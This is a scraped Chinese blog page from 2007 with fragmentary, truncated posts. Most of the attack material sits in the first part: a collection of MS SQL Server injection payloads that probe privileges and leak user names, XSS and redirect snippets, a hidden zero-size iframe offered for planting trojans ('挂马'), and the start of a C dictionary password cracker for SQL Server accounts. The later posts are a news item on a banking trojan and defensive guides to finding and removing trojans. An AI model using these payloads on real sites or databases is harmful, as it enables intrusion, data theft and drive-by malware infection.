http://blog.sina.com.cn/windcan[订阅]
个人资料
评论
读取中...
图片幻灯
访客
读取中...
好友
读取中...
音乐播放器
分类
    内容读取中…
博文
啊D常用注入命令收集(2007-06-18 05:08)

//看看是什么权限的
and 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--

//检测是否有读取某数据库的权限
and 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --

数字类型
and char(124)%2Buser%2Bchar(124)=0

字符类型
and char(124)%2Buser%2Bchar(124)=0 and ''='

搜索类型
and char(124)%2Buser%2Bchar(124)=0 and '%'='

爆用户名
 and user>0
and user>0 and ''='

检测是否为SA权限
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --

检测是

 转载

 

〈script〉alert('******')〈/script〉 
〈meta http-equiv='refresh' content='1;url=http://www.baidu.com'〉  转向代码

〈script language=vbscript〉 window.location.href='http://www.baidu.com' 〈/script〉

指定转象
百度

〈iframe name='I1' src='http://www.baidu.com/' width='0' height='0'〉 〈/iframe〉

挂马

源码编辑模式在〈/tbody〉前插入跨站代码:
〈script〉windows.open(’http://www.xxxx.com/info.asp?msg=’+d

  转载

这篇文章的重点是如何探测MS SQL SERVER账号的密码,下面以一个实例来说明探测密码的全过程。

 

   //程序所用到的头文件   //定义全局变量   char dict[20000][40],//准备探测的密码   UserName[40],//用户名   target[40],//目标服务器   passwd[40];//已经探测出来的正确密码   int total=0;//字典里面单词数量   BOOL Cracked=FALSE;//探测密码成功时此值为TRUE   //   //函数:usage   //功能:显示程序帮助信息   //   void usage()   {   printf(
 前几日记者获悉,国家防病毒应急中心联合实验室(ChinaLab)发出警报,横扫网络的“灰鸽子”木马程序再度重现,并升级为盗取网银账号能力强百倍的“黑鸽子”。

  专家指出,两个多月前,数以万计的灰鸽子变种木马程序现身网络煻此次被拦截到的“黑鸽子”则是共计6万多种系列“灰鸽子”变种的统称,因其攻击方式由明转暗(非显性攻击)而得名。也就是说,和以前“灰鸽子”的大规模显性攻击不同的是,“黑鸽子”并非以大规模
挖出你爱机中勒木马(2007-06-16 05:55)
   1、集成到程序中
   其实木马也是一个服务器-客户端程序,它为了不让用户能轻易地把它删除,就常常集成到程序里,一旦用户激活木马程序,那么木马文件和某一应用程序捆绑在一起,然后上传到服务端覆盖原文件,这样即使木马被删除了,只要运行捆绑了木马的应用程序,木马又会被安装上去了。绑定到某一应用程序中,如绑定到系统文件,那么每一次Windows启动均会启动木马。  
   2、隐藏在配置文件中   
   木马实在是太狡猾,知道菜鸟们平时使用的是图形化界面的操作系统,对于那些已经不太重要的配置文件大多数是不闻不问了,这正好给木马提供了一个藏身之处。而且利用配置文件的特殊作用,木马很容易就能在大家的计算机中运行、发作,从而偷窥或者监视大家。不过,现在这种方式不是很隐蔽,容易被发现,所以在Autoexec.bat和Config.sys中加载木马程序的并不多见,但也不能因此而掉以轻心
如何清除插入式木马(2007-06-16 05:26)
      目前网络上最猖獗的病毒估计非木马程序莫数了,现在的木马攻击性越来越强,在进程隐藏方面,很少采用独立的EXE可执行文件形式,而是改为内核嵌入方式、远程线程插入技术、挂接PSAPI等,这些木马也是目前最难对付的。现在教你查找和清除线程插入式木马。
一、通过自动运行机制查木马
    一说到查找木马,许多人马上就会想到通过木马的启动项来寻找“蛛丝马迹”,具体的地方一般有以下几处:
    1)注册表启动项
      在“开始/运行”中输入“regedit.exe”打开注册表编辑器,依次展开[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\]和[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\],查看下面所有以Run开头的项,其下是否有新增的